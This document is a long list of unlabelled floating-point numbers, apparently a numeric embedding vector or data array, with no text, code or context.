-0.003418287727981806, 0.032656263560056686, 0.05430910736322403, -0.014875267632305622, 0.0009836334502324462, 0.018024370074272156, 0.013636276125907898, 0.023083582520484924, 0.00868031196296215, -0.024307824671268463, -0.014624519273638725, -0.020620349794626236, 0.014211522415280342, -0.0016289412742480636, 0.011954788118600845, -0.010494548827409744, -0.0038829094264656305, 0.036314237862825394, -0.0005333008011803031, 0.007349134422838688, -0.03168277069926262, -0.018053868785500526, 0.008702436462044716, -0.056226592510938644, 0.0044212802313268185, 0.00992667768150568, -0.06879349797964096, 0.02003035508096218, -0.06177255138754845, -0.027154553681612015, -0.01730162464082241, -0.03032577969133854, -0.03929371386766434, 0.013864899054169655, -0.042981188744306564, 0.023422829806804657, 0.049618639051914215, -0.024750320240855217, 0.01466139405965805, 0.03156477212905884, -0.0029499786905944347, 0.03489824756979942, -0.012146537192165852, -0.028909791260957718, -0.02259683609008789, 0.026830054819583893, -0.026815306395292282, -0.03274476155638695, -0.03171227127313614, 0.0026826367247849703, -0.024676570668816566, -0.02129884622991085, 0.02010410465300083, -0.019278110936284065, 0.012869281694293022, 0.02525181695818901, -0.005619709379971027, 0.02803954668343067, -0.013385527767241001, 0.03312826156616211, -0.01601838320493698, 0.0057524582371115685, 0.030237281695008278, 0.017744122073054314, 0.015605387277901173, -0.02255258709192276, -0.0266235563904047, -0.01185891404747963, 0.01874711364507675, 0.020148353651165962, 0.004694153554737568, 0.0035750053357332945, -0.0316532701253891, 0.026785805821418762, -0.022051090374588966, 0.02004510536789894, 0.013348652981221676, 0.03026678040623665, -0.013805899769067764, 0.03935271501541138, -0.02277383580803871, -0.0022272339556366205, 0.03805472329258919, -0.009919303469359875, 0.01855536550283432, -0.0587930753827095, 0.026874305680394173, -0.03421975299715996, 0.002203265205025673, 0.03227276727557182, -0.014034523628652096, -0.006866075098514557, 0.0015975978458300233, 0.012891406193375587, -0.018201367929577827, 0.015369388274848461, 0.02361457794904709, 0.013053655624389648, -0.006154392845928669, -0.05433860793709755, -0.028703292831778526, -0.02629905939102173, -0.01333390362560749, -0.0009172589634545147, 0.006069581024348736, 0.027213552966713905, -0.003309507155790925, -0.023083582520484924, -0.01194003876298666, 0.0013210372999310493, -0.019292859360575676, -0.005907332058995962, 0.04242069274187088, -0.011364792473614216, -0.01966160722076893, 0.028142796829342842, 0.005789333023130894, 0.0005190118681639433, 0.04115220159292221, 0.009712805040180683, -0.04233219474554062, -0.03826122358441353, 0.01463926862925291, 0.0003463920147623867, 0.011401667259633541, -0.00298316590487957, 0.021903591230511665, 0.01607738435268402, -0.004996526055037975, 0.0373467281460762, 0.003008978208526969, -0.03832022100687027, 0.026771055534482002, -0.02126934565603733, 0.022906584665179253, -0.01525138970464468, 0.028216546401381493, 0.030075032263994217, 0.011962163262069225, -0.005144025199115276, 0.011010794900357723, 0.010944420471787453, -0.020738350227475166, 0.005918394774198532, -0.01994185522198677, 0.013016780838370323, 0.013518276624381542, -0.016490381211042404, 0.0017063783016055822, 0.012965155765414238, 0.006124893203377724, 0.009439931251108646, 0.03979521244764328, -0.009646429680287838, 0.0035381305497139692, -0.002701074117794633, -0.012360410764813423, 0.001432583318091929, 0.01969110779464245, 0.03212526813149452, -0.001064757932908833, 0.020148353651165962, -0.036609236150979996, -0.018879862502217293, 0.0070356992073357105, -0.009144933894276619, 0.008510688319802284, -0.015546387061476707, -0.030178280547261238, -0.020900597795844078, -0.000058855530369328335, -0.0079501923173666, 0.0421551950275898, -0.002741636475548148, -0.023290080949664116, 0.007334384135901928, 0.015037516131997108, 0.03174176812171936, 0.020620349794626236, 0.014410645700991154, -0.02377682738006115, -0.025797562673687935, 0.03309876099228859, -0.012832406908273697, -0.02626955881714821, -0.011003420688211918, -0.005110837984830141, 0.0002040786057477817, 0.010973920114338398, -0.01459501963108778, -0.032567765563726425, 0.03708123043179512, 0.011106669902801514, -0.02534031681716442, -0.02007460407912731, 0.03560624271631241, -0.0428926907479763, -0.01132791768759489, -0.02784779854118824, -0.0012417566031217575, -0.011836789548397064, 0.0033187258522957563, -0.009071184322237968, 0.005933144595474005, 0.005612334236502647, -0.048409149050712585, -0.006659576669335365, 0.029809534549713135, -0.000806173833552748, 0.030016032978892326, 0.0035731615498661995, 0.012869281694293022, 0.013208528980612755, -0.026077810674905777, -0.001451942604035139, 0.015413638204336166, 0.032331764698028564, 0.0197648573666811, -0.005863082595169544, 0.004089408088475466, -0.016342882066965103, 0.02514856681227684, -0.03740572929382324, -0.025443565100431442, -0.007522445637732744, -0.013555151410400867, 0.005785645451396704, -0.006843950599431992, -0.024927319958806038, 0.016431380063295364, 0.031122274696826935, 0.015516887418925762, -0.015398888848721981, -0.0014703799970448017, 0.0053800237365067005, -0.010848546400666237, -0.01836361736059189, 0.004015658516436815, 0.012832406908273697, -0.023231081664562225, 0.017980119213461876, -0.010155301541090012, -0.03404275327920914, -0.011357417330145836, 0.008488563820719719, 0.04805515334010124, 0.0020834223832935095, -0.0028891353867948055, 0.020694099366664886, -0.026756305247545242, 0.0034385689068585634, 0.0125816585496068, 0.04212569445371628, -0.000483059004181996, -0.04395468160510063, 0.014786767773330212, -0.005719271022826433, -0.01845211535692215, -0.011792539618909359, -0.016328131780028343, 0.020295852795243263, -0.007234822493046522, -0.004819527734071016, 0.018053868785500526, 0.008931060321629047, 0.0253108162432909, 0.044279180467128754, 0.0031343523878604174, 0.008945810608565807, 0.007540883030742407, 0.012972530908882618, -0.01591513492166996, -0.00042267661774531007, 0.035222746431827545, 0.006862387992441654, -0.017522873356938362, 0.02666780725121498, -0.02663830667734146, 0.01733112521469593, 0.0428926907479763, -0.009852929040789604, -0.006818138062953949, -0.012212911620736122, -0.027434801682829857, -0.010568298399448395, -0.0033279445488005877, -0.00787644274532795, -0.02362932823598385, -0.03277426213026047, -0.005066588055342436, 0.031240273267030716, -0.02767079882323742, 0.0024521697778254747, -0.0020078292582184076, 0.02410132624208927, -0.014690893702208996, -0.020177854225039482, 0.04510517418384552, -0.02367357909679413, 0.018201367929577827, 0.008739311248064041, 0.00986767839640379, 0.0013606776483356953, 0.028806541115045547, -0.006784950848668814, -0.024337323382496834, 0.018245616927742958, 0.014226271770894527, 0.03059127740561962, -0.010907545685768127, 0.02231658808887005, 0.028895040974020958, -0.011637665331363678, -0.034809745848178864, 0.014012398198246956, 0.02764130011200905, 0.0025554189924150705, -0.019012611359357834, 0.022213339805603027, 0.0369042307138443, -0.018230868503451347, -0.0015616449527442455, -0.014801518060266972, 0.016903378069400787, 0.028393544256687164, -0.03545874357223511, 0.015339888632297516, 0.0012482097372412682, 0.019528858363628387, -0.01572338677942753, 0.006191267631947994, 0.0060400813817977905, 0.021623343229293823, -0.006132267881184816, 0.013820650056004524, 0.005907332058995962, 0.0065489523112773895, 0.03525224328041077, -0.023304831236600876, 0.014949016273021698, 0.009705429896712303, -0.002536981599405408, -0.009543180465698242, -0.04896964505314827, 0.04124069958925247, 0.0037077544257044792, 0.015103890560567379, 0.05545959621667862, -0.01716887578368187, 0.00042705549276433885, 0.01595938391983509, 0.01399764884263277, -0.007496633101254702, -0.011239418759942055, -0.03168277069926262, -0.014941642060875893, 0.0036653485149145126, -0.005144025199115276, -0.012758657336235046, 0.003787035122513771, -0.0007568539003841579, 0.017213124781847, -0.009661179967224598, 0.014676143415272236, 0.010959170758724213, 0.02644655853509903, -0.011726165190339088, 0.024765070527791977, -0.02507481910288334, 0.014786767773330212, -0.014668768271803856, -0.012935656122863293, -0.01855536550283432, 0.024661820381879807, 0.04743565618991852, 0.0040414705872535706, -0.02628430910408497, -0.01964685693383217, -0.0017100657569244504, 0.022818084806203842, 0.04545916989445686, 0.01986810564994812, 0.006814450491219759, 0.013533026911318302, -0.010096302255988121, -0.023245831951498985, 0.005475897807627916, 0.022065840661525726, -0.0073638842441141605, 0.0047089033760130405, -0.01746387407183647, -0.01463189348578453, 0.012021162547171116, 0.01390914898365736, -0.019440358504652977, -0.013894399628043175, -0.00999305211007595, 0.012987281195819378, -0.01988285593688488, -0.01985335536301136, 0.0028872916009277105, 0.008046066388487816, -0.03858571872115135, -0.007972316816449165, 0.023231081664562225, 0.029912782832980156, 0.002533294027671218, -0.041594699025154114, 0.0021221409551799297, 0.010133176110684872, 0.020472852513194084, -0.020399102941155434, 0.003554724156856537, -0.005081338342279196, -0.006456765811890364, 0.014904767274856567, -0.005398460663855076, -0.0079501923173666, 0.008864685893058777, -0.023393331095576286, -0.009026934392750263, -0.01516288984566927, 0.024632321670651436, -0.02000085450708866, 0.007127885706722736, 0.01463926862925291, 0.0068882000632584095, -0.03598973900079727, 0.005590209271758795, 0.0032726326026022434, -0.029440786689519882, 0.006788638420403004, 0.0139312744140625, 0.01398289855569601, -0.02634330838918686, -0.009550555609166622, -0.04224369302392006, 0.03678623214364052, 0.005675021559000015, -0.033895254135131836, 0.02674155682325363, -0.0006250267033465207, -0.010494548827409744, -0.0018418929539620876, -0.004856402520090342, 0.0007812834228388965, 0.021785592660307884, -0.05079863220453262, 0.0018842988647520542, 0.019484609365463257, 0.011482791975140572, 0.031269773840904236, -0.02365882880985737, -0.016298631206154823, -0.011018170043826103, 0.03542924299836159, -0.006169142667204142, -0.0399722084403038, -0.026033561676740646, -0.0014510207111015916, -0.022287089377641678, 0.022198589518666267, 0.0034072252456098795, 0.02513381838798523, -0.007127885706722736, -0.001463926862925291, 0.01727212406694889, -0.0015680979704484344, -0.0002267796080559492, -0.007135260850191116, 0.005214087199419737, -0.0347212478518486, -0.008311565034091473, 0.016578879207372665, -0.030089782550930977, 0.012050663121044636, -0.009321932680904865, -0.018157118931412697, -0.005866770166903734, -0.037700727581977844, -0.005933144595474005, 0.031122274696826935, 0.03696323186159134, 0.011718790046870708, 0.015516887418925762, 0.034426249563694, -0.053394611924886703, 0.016947627067565918, -0.026903804391622543, 0.020767848938703537, -0.004465530160814524, 0.01132054254412651, -0.016475630924105644, 0.021800341084599495, -0.02237558737397194, 0.008658187463879585, -0.0033058198168873787, -0.002374732866883278, -0.0029923846013844013, -0.020163103938102722, 0.007647819351404905, 0.0006190345739014447, 0.002756386296823621, 0.01532513927668333, 0.02007460407912731, 0.013356028124690056, 0.03295126184821129, 0.036491233855485916, -0.02520756796002388, 0.022995082661509514, -0.01067892275750637, 0.007905942387878895, 0.004867464769631624, -0.024248823523521423, 0.00929243303835392, -0.00496702641248703, -0.027125053107738495, -0.02666780725121498, 0.029853783547878265, -0.020266352221369743, 0.011047669686377048, -0.051270630210638046, -0.022213339805603027, -0.008842560462653637, -0.02777404896914959, -0.014196772128343582, 0.008908935822546482, -0.011563915759325027, -0.017876870930194855, 0.003724348032847047, -0.007238510064780712, -0.010811671614646912, -0.007529820315539837, -0.001203038147650659, -0.020767848938703537, 0.0007886583334766328, -0.006021643988788128, -0.0039087217301130295, 0.01457289420068264, -0.04619666561484337, -0.028128046542406082, -0.0347212478518486, -0.014019773341715336, -0.01134266797453165, 0.01053142361342907, -0.01737537421286106, -0.0367567352950573, 0.010634672828018665, 0.024278324097394943, 0.028113296255469322, -0.017522873356938362, -0.015531637705862522, -0.01059042289853096, -0.0034385689068585634, -0.011733540333807468, -0.008370564319193363, 0.0036837859079241753, -0.002568325027823448, -0.0027840423863381147, -0.01964685693383217, 0.02761179953813553, -0.011785164475440979, -0.03171227127313614, 0.0021645468659698963, -0.013429777696728706, -0.028659041970968246, -0.002715824171900749, -0.02641705796122551, -0.03321675956249237, -0.0053763361647725105, -0.01708037592470646, 0.004292218945920467, 0.01994185522198677, 0.020590851083397865, -0.005365273449569941, -0.005940519273281097, -0.0036247861571609974, 0.01581188477575779, -0.020207352936267853, -0.02401282638311386, -0.03716973215341568, 0.020797349512577057, 0.007728944066911936, -0.002341545419767499, 0.010789547115564346, 0.000966118008363992, 0.008908935822546482, -0.025768063962459564, 0.011711414903402328, -0.019071612507104874, 0.0034865059424191713, 0.01588563434779644, -0.008274690248072147, -0.041830696165561676, 0.020649850368499756, 0.01383539941161871, -0.0008942122804000974, -0.031269773840904236, -0.011091919615864754, 0.022242838516831398, 0.01317165419459343, -0.02110709622502327, -0.015044891275465488, -0.04076870530843735, -0.008650812320411205, -0.03324626013636589, -0.022006841376423836, -0.013894399628043175, -0.007647819351404905, 0.000833829864859581, -0.03855622187256813, -0.006678014062345028, 0.02261158637702465, 0.027066053822636604, -0.016962377354502678, 0.0054205856285989285, -0.019056862220168114, 0.004402843303978443, -0.02258208580315113, -0.011556541547179222, -0.04902864620089531, -0.009919303469359875, 0.006718576420098543, -0.027228303253650665, 0.0031859769951552153, -0.010841171257197857, 0.016564130783081055, -0.0033592882100492716, 0.004874839447438717, 0.03961821272969246, 0.00530627416446805, -0.017508123070001602, -0.020915348082780838, -0.000772525672800839, -0.01966160722076893, -0.02405707538127899, 0.039234716445207596, -0.018850363790988922, 0.00165567547082901, -0.011659790761768818, 0.022080589085817337, -0.008171441033482552, -0.006976699456572533, -0.015207139775156975, -0.013665775768458843, -0.0004468756669666618, 0.002865166636183858, -0.0449281744658947, 0.04247969388961792, 0.005354211200028658, 0.022847583517432213, 0.004801090341061354, -0.009462056681513786, -0.022110089659690857, -0.04079820588231087, -0.018953612074255943, 0.002182984258979559, -0.010236426256597042, -0.013621525838971138, 0.029485035687685013, 0.01331915333867073, 0.005118213128298521, -0.016401881352066994, 0.006755451206117868, -0.029898032546043396, -0.02495681867003441, 0.018997862935066223, -0.021638093516230583, -0.0079501923173666, 0.015605387277901173, -0.018127618357539177, -0.008495938032865524, 0.01579713635146618, 0.006814450491219759, -0.01581188477575779, 0.002267796080559492, 0.007242197636514902, -0.0020299539901316166, 0.012625908479094505, 0.005405835807323456, -0.01134266797453165, -0.005885207559913397, 0.014816267415881157, 0.008894185535609722, 0.006604264490306377, 0.0018898301059380174, 0.00934405717998743, -0.007386008743196726, 0.003504943335428834, -0.023481829091906548, -0.001325646648183465, -0.056403592228889465, -0.04233219474554062, 0.0026402308139950037, -0.0052362121641635895, -0.007327009458094835, -0.02376207709312439, -0.01719837449491024, 0.011431166902184486, -0.004513467196375132, 0.004742090590298176, 0.028260795399546623, 0.011239418759942055, -0.024676570668816566, -0.0038054725155234337, 0.014123022556304932, 0.06401453912258148, 0.0021682342048734426, 0.021475844085216522, -0.013569901697337627, 0.01259640883654356, 0.011630291119217873, 0.0038165347650647163, 0.011003420688211918, -0.004399155732244253, -0.03870372101664543, -0.00017100656987167895, -0.014005023054778576, -0.024897819384932518, -0.019263360649347305, -0.01724262535572052, 0.00463515380397439, 0.004601966589689255, -0.004613028839230537, 0.005778270773589611, 0.025679564103484154, -0.00630189199000597, 0.0047052158042788506, 0.0013348653446882963, -0.016460880637168884, 0.0026881680823862553, -0.01861436478793621, -0.003285538638010621, -0.008842560462653637, -0.019366608932614326, -0.033747754991054535, 0.01267753355205059, 0.020340101793408394, -0.055076099932193756, 0.008827811107039452, 0.02787729725241661, 0.007492945529520512, 0.019558358937501907, -0.009410431608557701, -0.013459277339279652, -0.01700662635266781, -0.0015275358455255628, -0.011895788833498955, -0.015398888848721981, -0.001792112016119063, 0.002573856385424733, 0.08218640089035034, 0.02123984694480896, -0.028467293828725815, -0.014550769701600075, -0.0020059854723513126, -0.006914012599736452, 0.0011486479779705405, 0.016328131780028343, 0.016401881352066994, 0.000648073444608599, 0.03947071358561516, -0.00012848539336118847, -0.006158080417662859, -0.0007319634314626455, -0.0027508551720529795, -0.0016390818636864424, 0.01191791333258152, 0.013592026196420193, 0.018098119646310806, 0.013134779408574104, 0.008149315603077412, 0.016637878492474556, 0.031063275411725044, -0.04085720330476761, 0.0029094163328409195, -0.027390550822019577, -0.008495938032865524, -0.010981295257806778, -0.010088927112519741, -0.008997434750199318, -0.0238505769520998, -0.005125587806105614, -0.007013574242591858, 0.0035381305497139692, 0.0068808249197900295, 0.010479799471795559, 0.03053227812051773, 0.0040451581589877605, -0.0038718469440937042, -0.021726593375205994, -0.010988670401275158, -0.030797777697443962, 0.020959598943591118, -0.021475844085216522, -0.013754275627434254, -0.0035399743355810642, 0.0421551950275898, 0.023599829524755478, 0.008488563820719719, -0.0028614792972803116, 0.016859127208590508, -0.006574764847755432, 0.026063060387969017, 0.027184052392840385, 0.006991449277848005, -0.0017100657569244504, -0.01187366433441639, 0.010988670401275158, 0.0047531528398394585, -0.03539974242448807, 0.017803121358156204, 0.012168661691248417, 0.016652628779411316, 0.010900170542299747, 0.00788381788879633, -0.005173524841666222, -0.011740914545953274, 0.0019414547132328153, 0.006489953026175499, 0.011527041904628277, -0.0068845124915242195, 0.003420131513848901, -0.006674326490610838, -0.0006987761589698493, 0.012190786190330982, 0.03283326327800751, -0.013016780838370323, -0.022110089659690857, -0.003176758298650384, -0.01737537421286106, 0.01871761493384838, -0.005925769452005625, -0.00761831970885396, 0.005745083559304476, -0.006158080417662859, -6.878001954646606e-7, 0.01251528412103653, -0.03994271159172058, 0.015384138561785221, -0.02514856681227684, -0.009373556822538376, -0.002238296205177903, 0.02361457794904709, 0.0027858861722052097, 0.008466438390314579, -0.017891621217131615, 0.020708849653601646, 0.000423828954808414, -0.0031085400842130184, -0.006914012599736452, -0.002372889081016183, -0.007201635278761387, 0.021844591945409775, 0.024411072954535484, 0.009026934392750263, 0.012773407623171806, 0.004365968517959118, 0.022124839946627617, 0.005977394059300423, -0.006799700669944286, -0.03537024185061455, -0.024750320240855217, 0.01185153890401125, -0.026151560246944427, 0.0058888946659862995, -0.0032818512991070747, -0.0030034470837563276, -0.02396857552230358, 0.004214781802147627, 0.00011027849541278556, -0.009963552467525005, 0.0010758202988654375, 0.023526079952716827, -0.02112184651196003, 0.018879862502217293, -0.000314126635203138, -0.0067407009191811085, -0.020059853792190552, 0.02519281767308712, 0.03436725214123726, 0.041860196739435196, -0.006600577384233475, 0.011976913549005985, -0.016844378784298897, 0.0367567352950573, -0.02650555782020092, -0.02143159508705139, -0.012898781336843967, 0.022065840661525726, -0.00046001229202374816, -0.01719837449491024, 0.010258550755679607, 0.026225309818983078, 0.03351175785064697, 0.023540830239653587, -0.007124198134988546, -0.0014906610595062375, 0.013606776483356953, 0.005870457272976637, -0.017552372068166733, -0.004413905553519726, -0.004841652233153582, 0.04407268017530441, 0.016593629494309425, 0.0006070503150112927, 0.0028024797793477774, 0.013717400841414928, -0.004605654161423445, -0.004487655125558376, 0.0017026907298713923, -0.0022253901697695255, 0.02143159508705139, 0.01702137663960457, 0.0016787222120910883, -0.003543661907315254, 0.014418020844459534, 0.010715797543525696, -0.05737708508968353, -0.011239418759942055, -0.015022765845060349, 0.006161767989397049, 0.0011394292814657092, -0.004690465983003378, 0.0212250966578722, 0.02104809693992138, -0.001515551470220089, -0.006279767025262117, -0.028201796114444733, -0.005191962234675884, -0.006338766776025295, 0.006932449527084827, 0.022228088229894638, 0.0019267047755420208, -0.014558144845068455, 0.039057716727256775, -0.009063809178769588, 0.008112440817058086, 0.0015321451937779784, -0.04268619045615196, 0.0005826207925565541, 0.010723172686994076, 0.03548824414610863, -0.0066927638836205006, -0.02144634537398815, -0.024558572098612785, -0.0075519452802836895, -0.01053142361342907, 0.002151640597730875, -0.009771804325282574, -0.004336468409746885, 0.003125133691355586, 0.0021737655624747276, 0.009026934392750263, -0.0019082673825323582, 0.007928067818284035, -0.03716973215341568, -0.008886810392141342, -0.008267315104603767, -0.023245831951498985, 0.005811457987874746, -0.025797562673687935, -0.0004023955261800438, 0.011593416333198547, 0.023349080234766006, 0.009189183823764324, 0.007334384135901928, 0.0074118212796747684, -0.01606263406574726, 0.01326015405356884, 0.008916310034692287, -0.01868811435997486, 0.0012472878443077207, -0.0004987307474948466, 0.0001300986623391509, -0.0037796602118760347, -0.023511329665780067, 0.028850790113210678, -0.007714194245636463, -0.0067038265988230705, 0.007773193530738354, 0.013385527767241001, 0.007319634314626455, 0.003501255763694644, 0.019160110503435135, -0.005446398165076971, 0.010892796330153942, -0.003414600156247616, -0.006799700669944286, 0.012338285334408283, -0.01600363478064537, 0.0011523354332894087, -0.005951581988483667, -0.028688542544841766, 0.009395682252943516, 0.0008047910523600876, -0.0001548738800920546, 0.019042111933231354, 0.01857011578977108, -0.006759138312190771, 0.02249358780682087, -0.023467080667614937, 0.0032800075132399797, 0.0045724669471383095, -0.009439931251108646, -0.005077650770545006, 0.015649637207388878, -0.02001560479402542, 0.0005475897924043238, 0.032626762986183167, -0.018230868503451347, 0.006615327205508947, -0.00867293681949377, -0.02236083708703518, -0.0060290186665952206, -0.014764643274247646, 0.002586762420833111, -0.01746387407183647, -0.006309266667813063, -0.0049780891276896, 0.020133603364229202, -0.01132054254412651, 0.012279286049306393, 0.005140337627381086, 0.003964033909142017, -0.019174860790371895, 0.024425823241472244, -0.016977127641439438, -0.03289226070046425, -0.0077363187447190285, -0.0010288050398230553, 0.002868854207918048, 0.05141812562942505, -0.006843950599431992, -0.015133390203118324, -0.0017681433819234371, -0.01579713635146618, -0.014395895414054394, -0.016918126493692398, 0.008208315819501877, -0.0047125909477472305, 0.012183411978185177, 0.01572338677942753, -0.03289226070046425, -0.007448696065694094, 0.009845553897321224, -0.010892796330153942, -0.033924754709005356, 0.0291752889752388, 0.0021147658117115498, -0.003759379032999277, 0.01989760622382164, 0.013392902910709381, 0.03191876783967018, 0.02895404025912285, 0.0020096730440855026, 0.010206925682723522, -0.02395382709801197, -0.01719837449491024, 0.029853783547878265, 0.0032929135486483574, 0.02783304825425148, -0.03604874014854431, -0.009137558750808239, -0.018289867788553238, 0.012898781336843967, 0.02905728854238987, 0.00008953645738074556, 0.02240508794784546, -0.009852929040789604, -0.023172082379460335, -0.012707033194601536, 0.025620564818382263, 0.010774796828627586, -0.03315775841474533, -0.020354852080345154, -0.0009983833879232407, -0.010177426040172577, 0.002037328900769353, -0.023334329947829247, 0.008363189175724983, 0.03436725214123726, 0.010391299612820148, 0.008990059606730938, 0.009705429896712303, 0.04009021073579788, -0.024499572813510895, 0.0005148634663783014, 0.02115134708583355, -0.0015856134705245495, -0.028836041688919067, -0.021815091371536255, 0.028526293113827705, -0.015280889347195625, -0.011881038546562195, 0.0012389910407364368, -0.005933144595474005, -0.022862333804368973, 0.009226057678461075, -0.003291069995611906, 0.010302800685167313, 0.010833796113729477, -0.011954788118600845, -0.015502138063311577, 0.006242892239242792, 0.01842261664569378, 0.028850790113210678, 0.0023046708665788174, 0.01201378833502531, -0.01842261664569378, -0.02783304825425148, -0.006445703096687794, 0.00023807249090168625, 0.0009292432805523276, 0.0029444473329931498, -0.01746387407183647, -0.0016381599707528949, -0.009801303967833519, -0.023349080234766006, -0.01324540376663208, 0.01187366433441639, -0.029647285118699074, -0.0017635341500863433, 0.008872061036527157, 0.011881038546562195, -0.012869281694293022, 0.026697305962443352, 0.03147627040743828, 0.011740914545953274, -0.035193245857954025, 0.014867892488837242, -0.005722958594560623, 0.016859127208590508, -0.019528858363628387, 0.0029757909942418337, -0.032361265271902084, -0.00861393753439188, -0.026240060105919838, -0.0029370724223554134, -0.012190786190330982, -0.008141941390931606, -0.0016409256495535374, 0.005995831452310085, -0.007437633816152811, 0.04767165333032608, -0.003073509084060788, 0.019071612507104874, 0.010501923970878124, 0.02362932823598385, -0.012412034906446934, 0.011534416116774082, 0.01833411678671837, 0.025959812104701996, -0.011453292332589626, 0.017640871927142143, -0.0017349561676383018, -0.005405835807323456, -0.004365968517959118, -0.012618533335626125, 0.024234075099229813, 0.005003901198506355, 0.019558358937501907, -0.008451689034700394, 0.03870372101664543, -0.00040101271588355303, -0.028305044397711754, 0.0021461094729602337, -0.0025775437243282795, 0.013732150197029114, -0.009580055251717567, -0.010420799255371094, -0.005575459450483322, 0.02131359465420246, -0.02115134708583355, -0.03026678040623665, 0.014322145842015743, 0.013164279982447624, 0.0395297147333622, -0.026830054819583893, 0.012736532837152481, 0.021490594372153282, 0.0020059854723513126, 0.03808422386646271, 0.022154338657855988, 0.013643651269376278, -0.02132834494113922, -0.02115134708583355, 0.008842560462653637, -0.004579841624945402, -0.007260635029524565, -0.027021804824471474, 0.006124893203377724, -0.0026660431176424026, -0.023113083094358444, 0.008864685893058777, 0.004141032695770264, -0.020679350942373276, 0.0054242732003331184, 0.0018418929539620876, 0.000032841559004737064, -0.014764643274247646, 0.013894399628043175, 0.005099775735288858, 0.017847370356321335, -0.0003731262113433331, -0.014794142916798592, -0.00795756746083498, 0.026063060387969017, -0.0033039760310202837, -0.012773407623171806, 0.020502351224422455, 0.006737013813108206, -0.004885902162641287, 0.012353035621345043, -0.005973706487566233, 0.01601838320493698, 0.009248183108866215, -0.01120254397392273, -0.021947840228676796, -0.001382802496664226, -0.03587174043059349, 0.01831936649978161, -0.008444313891232014, 0.0009559774189256132, -0.01992710493505001, -0.005623396951705217, 0.0060363938100636005, -0.02401282638311386, -0.0017054564086720347, -0.0033592882100492716, 0.012205536477267742, 0.007275384850800037, 0.019145362079143524, -0.0022217025980353355, 0.009690679609775543, 0.009616930037736893, 0.04398418217897415, 0.0018824550788849592, 0.023555578663945198, -0.0035989738535135984, 0.005409523379057646, -0.008960559964179993, 0.009845553897321224, -0.019558358937501907, 0.021520094946026802, -0.005221462342888117, 0.0006453078240156174, 0.005217774771153927, 0.025856561958789825, 0.002254889812320471, 0.0119252884760499, 0.0007637679227627814, 0.00041184466681443155, -0.002177452901378274, -0.02541406638920307, 0.020413851365447044, -0.007422883529216051, -0.007426571100950241, 0.010066801682114601, 0.005062900949269533, -0.014064023271203041, 0.006460453383624554, -0.01975010707974434, 0.005155087448656559, 0.002601512474939227, 0.02535506710410118, 0.0021866715978831053, 0.0014565519522875547, -0.004447092767804861, 0.004616716410964727, 0.017950620502233505, 0.004738403018563986, 0.012264535762369633, 0.016313381493091583, -0.010782171972095966, 0.006464140489697456, -0.00728275952860713, 0.0009089621598832309, -0.007050449028611183, -0.018171869218349457, -0.004343843553215265, 0.007061511278152466, 0.011652415618300438, -0.011681915260851383, -0.028895040974020958, 0.013223279267549515, -0.002409763867035508, 0.009491556324064732, -0.008790936321020126, 0.016770629212260246, 0.00037980976048856974, 0.008451689034700394, -0.010450298897922039, -0.0010168207809329033, 0.0033851005136966705, -0.003735410515218973, -0.005166150163859129, -0.010450298897922039, -0.02393907681107521, -0.007091010920703411, 0.01573813520371914, -0.0185258649289608, -0.015133390203118324, -0.01855536550283432, -0.012559534050524235, -0.016431380063295364, 0.011445917189121246, -0.001128366799093783, -0.0010435549775138497, -0.03681573271751404, -0.007175823207944632, -0.01849636621773243, 0.006641139276325703, 0.020605601370334625, 0.00530627416446805, 0.004690465983003378, 0.016283882781863213, -0.004491342231631279, 0.010701047256588936, 0.002343389205634594, -0.01865861564874649, -0.011246793903410435, -0.0009587430395185947, -0.010302800685167313, -0.0031564771197736263, -0.0031601646915078163, 0.010081551969051361, 0.0034901935141533613, -0.003589755157008767, 0.01569388620555401, -0.006932449527084827, 0.03489824756979942, -0.010251175612211227, -0.015516887418925762, -0.01260378398001194, 0.02255258709192276, -0.005582834593951702, 0.004808465018868446, -0.01702137663960457, -0.027051303535699844, -0.028290294110774994, 0.0017893464537337422, -0.001854799105785787, -0.005486960057169199, 0.0028541043866425753, -0.018835613504052162, -0.010044677183032036, -0.020900597795844078, -0.014867892488837242, 0.0023581392597407103, 0.0070725735276937485, -0.013518276624381542, 0.011910539120435715, -0.010354424826800823, -0.010826421901583672, -0.017906369641423225, 0.013488776981830597, 0.058852072805166245, 0.012979906052350998, -0.024130824953317642, -0.02001560479402542, -0.01864386536180973, -0.02921953797340393, -0.002789573511108756, 0.004686778411269188, 0.010354424826800823, -0.0013164279516786337, 0.007197947707027197, 0.0021110784728080034, -0.024883069097995758, -0.016814878210425377, 0.010376549325883389, 0.010052052326500416, 0.0020483913831412792, -0.002241983776912093, 0.0021479532588273287, -0.003783347550779581, -0.0006996980519033968, -0.01576763577759266, -0.004627779126167297, -0.005582834593951702, 0.008326314389705658, 0.01864386536180973, 0.012618533335626125, 0.008650812320411205, -0.007610945031046867, 0.020310603082180023, -0.015037516131997108, 0.0012786313891410828, 0.0038275972474366426, -0.005391085986047983, -0.010730546899139881, -0.018850363790988922, 0.001795799471437931, 0.0024466384202241898, -0.008326314389705658, 0.002538825385272503, -0.004535592161118984, -0.006899262312799692, -0.005435335449874401, 0.011291042901575565, 0.01731637492775917, 0.008990059606730938, 0.010774796828627586, 0.01253003440797329, -0.014381146058440208, -0.015561137348413467, -0.02632855996489525, -0.016460880637168884, 0.00009564383799443021, 0.016682129353284836, 0.016431380063295364, -0.002345232991501689, 0.010863296687602997, 0.023437580093741417, 0.006165455095469952, 0.03147627040743828, -0.00859918724745512, -0.01576763577759266, 0.03144677355885506, 0.00006274466431932524, -0.004933839198201895, 0.01567913591861725, 0.008975310251116753, 0.008068191818892956, -0.0054205856285989285, 0.002347076777368784, 0.008813060820102692, -0.0009541336912661791, -0.013628900982439518, 0.005527522414922714, 0.014285271055996418, -0.005107150413095951, 0.00005787604459328577, -0.0033002886921167374, -0.01868811435997486, -0.014794142916798592, -0.0023765764199197292, -0.008849935606122017, 0.005999519024044275, -0.012692282907664776, 0.015266139060258865, -0.014270521700382233, 0.03159427270293236, 0.004495029803365469, -0.0027729799039661884, -0.030768277123570442, 0.010892796330153942, 0.024248823523521423, 0.0012500534066930413, 0.0024152949918061495, 0.01253740955144167, -0.01855536550283432, -0.003543661907315254, 0.001132054254412651, -0.0016612067120149732, 0.019086360931396484, 0.003086415119469166, -0.017640871927142143, 0.004292218945920467, 0.005405835807323456, 0.019366608932614326, -0.008149315603077412, 0.0029665722977370024, 0.0030532279051840305, -0.007566695101559162, 0.0024724507238715887, -0.005667646415531635, 0.000525464944075793, 0.020472852513194084, 0.011549166403710842, -0.019440358504652977, -0.006781263276934624, 0.004436030518263578, -0.020251603797078133, -0.007352821528911591, -0.006342453882098198, 